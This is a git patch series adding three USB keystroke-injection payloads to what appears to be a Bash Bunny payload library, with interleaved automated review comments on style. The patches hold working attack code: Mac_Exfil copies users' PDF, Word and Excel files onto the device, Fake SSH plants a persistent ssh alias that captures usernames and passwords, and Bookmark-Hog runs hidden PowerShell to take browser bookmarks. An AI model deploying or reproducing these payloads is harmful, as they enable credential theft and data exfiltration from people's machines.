From 2aa4910d0c5a0b0f9ddbf8aaa3e2adbce9ea7f12 Mon Sep 17 00:00:00 2001
From: Carey Balboa <52982329+careyjames@users.noreply.github.com>
Date: Tue, 30 Aug 2022 09:28:28 -0500
Subject: [PATCH 1/3] add my own exfil payload (#540)
* add my own exfil payload Exfiltrates files from logged in users Documents and Desktop folders
* updated
* Update readme.md
---
 .../exfiltration/Mac_Exfil/payload.txt | 45 +++++++++++++++++++
 .../library/exfiltration/Mac_Exfil/readme.md | 18 ++++++++
 2 files changed, 63 insertions(+)
 create mode 100755 payloads/library/exfiltration/Mac_Exfil/payload.txt
 create mode 100644 payloads/library/exfiltration/Mac_Exfil/readme.md
diff --git a/payloads/library/exfiltration/Mac_Exfil/payload.txt b/payloads/library/exfiltration/Mac_Exfil/payload.txt
new file mode 100755
index 00000000..d7a252cb
--- /dev/null
+++ b/payloads/library/exfiltration/Mac_Exfil/payload.txt
@@ -0,0 +1,45 @@
+#!/bin/bash
+
+# Title: Mac_Exfil
+# Description: Exfiltrates files from logged in users Documents and Desktop folders
+# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+# Target: macOS
+# Dependencies: none
+#
+# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot"
+LED SETUP
+ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267
+QUACK GUI SPACE
+QUACK DELAY 500
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE1
+QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot"
+QUACK ENTER
+QUACK DELAY 2000
+# Sync filesystem
+# By default, the Linux kernel writes data to disk asynchronously.
+# Writes are buffered (cached) in memory, and written to the storage device at the optimal time.
+# The sync command forces an immediate write of all cached data to disk.
+# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable,
+# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT)
+sync
+QUACK DELAY 2000
+LED STAGE2
+QUACK STRING "diskutil eject BUNNY && killall Terminal"
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE3
+# LED payload complete
+LED W FAST
+mount /dev/mmcblk0p1 /mnt
+files=$(find /mnt/loot -type f | wc -l)
+# debug=$(find /mnt/loot -type f)
+# DEBUG "switch-1-debug" "$files:$debug"
+umount /mnt
+if [ "$files" != "0" ]; then
+LED FINISH
+else
+LED FAIL
+fi
diff --git a/payloads/library/exfiltration/Mac_Exfil/readme.md b/payloads/library/exfiltration/Mac_Exfil/readme.md
new file mode 100644
index 00000000..fa9f7f7d
--- /dev/null
+++ b/payloads/library/exfiltration/Mac_Exfil/readme.md
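Review bot: The header comment lists Title, Description, Author, Target and Dependencies but has no STATUS section, although the script walks through six LED states (`LED SETUP`, `LED STAGE1`–`STAGE3`, `LED W FAST`, `LED FINISH`/`LED FAIL`) and the readme.md in this commit only names three colours; add a `# STATUS` block like the one in fake-ssh/payload.txt that maps each `LED` call to what it indicates. The same header gap is in Bookmark-Hog/payload.txt. As a point of style, the bodies of the closing `if … else … fi` (`LED FINISH`, `LED FAIL`) sit at column 0; indent them so the branch structure is visible.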
@@ -0,0 +1,18 @@
+# Mac_Exfil for the BashBunny
+
+* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+* Version: Version 1.0
+* Target: macOS
+
+## Description
+
+A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders
+
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Purple | Executing Payload |
+| Green | Successfully grabbed files |
+| Red | Did not get files |
From b10a644277e3d981d1ef96ec9a429b3cdf5052f1 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Tue, 30 Aug 2022 10:37:50 -0400
Subject: [PATCH 2/3] Add Fake SSH (#544)
1) Copies the "ssh" command spoofing program to the user's home directory.
2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
3) When the user executes the command "ssh" in a terminal, the spoofing program :
- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
---
 payloads/library/phishing/fake-ssh/README.md | 44 ++++++++++
 .../library/phishing/fake-ssh/payload.txt | 86 +++++++++++++++++++
 .../library/phishing/fake-ssh/ssh-phishing.sh | 48 +++++++++++
 3 files changed, 178 insertions(+)
 create mode 100644 payloads/library/phishing/fake-ssh/README.md
 create mode 100644 payloads/library/phishing/fake-ssh/payload.txt
 create mode 100644 payloads/library/phishing/fake-ssh/ssh-phishing.sh
diff --git a/payloads/library/phishing/fake-ssh/README.md b/payloads/library/phishing/fake-ssh/README.md
new file mode 100644
index 00000000..ca3bb433
--- /dev/null
+++ b/payloads/library/phishing/fake-ssh/README.md
@@ -0,0 +1,44 @@
+# Fake SSH
+
+- Title: Fake SSH
+- Author: TW-D
+- Version: 1.0
+- Target: Linux
+- Category: Phishing
+
+## Description
+
+1) Copies the "ssh" command spoofing program to the user's home directory.
+2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
+3) When the user executes the command "ssh" in a terminal, the spoofing program :
+- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
+- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+```
+
+From "ssh-phishing.sh" change the values of the following constants if necessary :
+```bash
+
+readonly MAXIMUM_ATTEMPTS=3
+
+```
+
+From "ssh-phishing.sh", change the payload if you wish :
+```bash
+##
+#
+##
+/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+##
+#
+##
+```
\ No newline at end of file
diff --git a/payloads/library/phishing/fake-ssh/payload.txt b/payloads/library/phishing/fake-ssh/payload.txt
new file mode 100644
index 00000000..2b941a78
--- /dev/null
+++ b/payloads/library/phishing/fake-ssh/payload.txt
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title: Fake-SSH
+#
+# Description:
+# This program creates a fake "ssh"
+# command by defining an persistent alias.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Phishing
+# Target: Linux
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file
diff --git a/payloads/library/phishing/fake-ssh/ssh-phishing.sh b/payloads/library/phishing/fake-ssh/ssh-phishing.sh
new file mode 100644
index 00000000..0d71f168
--- /dev/null
+++ b/payloads/library/phishing/fake-ssh/ssh-phishing.sh
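Review bot: The header describes installation (a copy at `~/.ssh_phishing.sh` and an `alias ssh=` line appended to `~/.bash_aliases`) and the LED STATUS block, but nothing in this file or in the README of the same commit says how to remove those two artifacts once a test is finished; add a `# REMOVAL` paragraph to the header naming both files so the host can be returned to its prior state. The `######## CLEANUP ########` stage as written only syncs and unmounts the Bunny's own storage, and a reader may otherwise take it to cover the host side as well.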
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Fake-SSH
+#
+# This program imitates the behavior
+# of the "ssh" command.
+#
+
+readonly MAXIMUM_ATTEMPTS=3
+
+attempts() {
+    /bin/echo -n "${1}'s password: "
+    read -r -s ssh_password
+    /bin/echo ""
+    /bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}"
+    if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then
+        ##
+        #
+        ##
+        /bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+        ##
+        #
+        ##
+        /bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null
+        /bin/rm "${SSH_ASKPASS}"
+        exit 0
+    fi
+    /bin/echo "Permission denied, please try again."
+}
+
+if [ "${#}" -eq 0 ]; then
+    /usr/bin/ssh
+else
+    for destination in "${@}"; do
+        if [[ "${destination}" =~ "@" ]]; then
+            export SSH_ASKPASS="/tmp/.askpass_script.sh"
+            /bin/echo "" > "${SSH_ASKPASS}"
+            chmod +x "${SSH_ASKPASS}"
+            for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
+                attempts "${destination}" "${*}"
+            done
+            /bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)."
+            /bin/rm "${SSH_ASKPASS}"
+            exit 0
+        fi
+    done
+    /usr/bin/ssh "${@}"
+fi
\ No newline at end of file
From 8e322706bcb80184ff490bc14b31c77d646cca67 Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Tue, 30 Aug 2022 10:56:42 -0400
Subject: [PATCH 3/3] New payload - Bookmark-Hog (#543)
---
 .../library/exfiltration/Bookmark-Hog/BBB.ps1 | 47 ++++++++
 .../exfiltration/Bookmark-Hog/README.md | 104 ++++++++++++++++++
 .../exfiltration/Bookmark-Hog/payload.txt | 22 ++++
 3 files changed, 173 insertions(+)
 create mode 100644 payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
 create mode 100644 payloads/library/exfiltration/Bookmark-Hog/README.md
 create mode 100644 payloads/library/exfiltration/Bookmark-Hog/payload.txt
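Review bot: The `##` / `#` / `##` fences around the `>> /tmp/.ssh_password` line inside `attempts` are empty, so the only explanation of that line lives in the README, which points readers at it by line number ("line 20"); a line number goes stale on the first edit above it. Put the explanation in the fence itself, e.g. `# Record handler — the README refers to this line; edit it to change where a captured username@host:password pair is written`, and have the README refer to that comment instead of a number. As a point of style, `attempts` reads as a plural noun while the function performs a single prompt; `attempt` or `prompt_once` would match what it does.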
diff --git a/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
new file mode 100644
index 00000000..043e1574
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
@@ -0,0 +1,47 @@
+#Bookmark-Hog
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
+$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
+
+if(!(Test-Path -Path $TARGETDIR )){
+    mkdir $TARGETDIR
+}
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+    try {
+        Write-Host "The chrome bookmark file has not been found. "
+    }
+    catch {
+        throw $_.Exception.Message
+    }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
+ }
+
+
+# See if file is a thing
+Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+    try {
+        Write-Host "The edge bookmark file has not been found. "
+    }
+    catch {
+        throw $_.Exception.Message
+    }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
+}
\ No newline at end of file
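Review bot: The comment `# Copy Chrome Bookmarks to Bash Bunny` above the second `else` sits over the Edge `Copy-Item`, and the `# See if file is a thing` comment above the unconditional Edge `Copy-Item` describes a check that line does not perform; change the first to `# Copy Edge Bookmarks to Bash Bunny` and give the second a comment that matches the copy it precedes. `$TARGETDIR` and `$TARGETDIR2` hold file paths (`Chromebm.txt`, `Edgebm.txt`) rather than a directory, so the names and the `# Test if directory exists …` comment above them do not describe what they contain; rename or reword so a reader does not take them for directories.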
diff --git a/payloads/library/exfiltration/Bookmark-Hog/README.md b/payloads/library/exfiltration/Bookmark-Hog/README.md
new file mode 100644
index 00000000..47fe90c7
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/README.md
@@ -0,0 +1,104 @@
+
+

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Bookmark-Hog + +A payload to exfiltrate bookmarks of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the bookmark history +These files will be saved to the bash bunny in the loot directory + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Let the magic happen + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Bookmark-Hog/payload.txt b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
new file mode 100644
index 00000000..392ab545
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
@@ -0,0 +1,22 @@
+# Title: Bookmark-Hog
+# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
+# Author: atomiczsec
+# Version: 1.0
+# Category: Exfiltration
+# Attackmodes: HID, Storage
+# Target: Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
+QUACK ENTER
\ No newline at end of file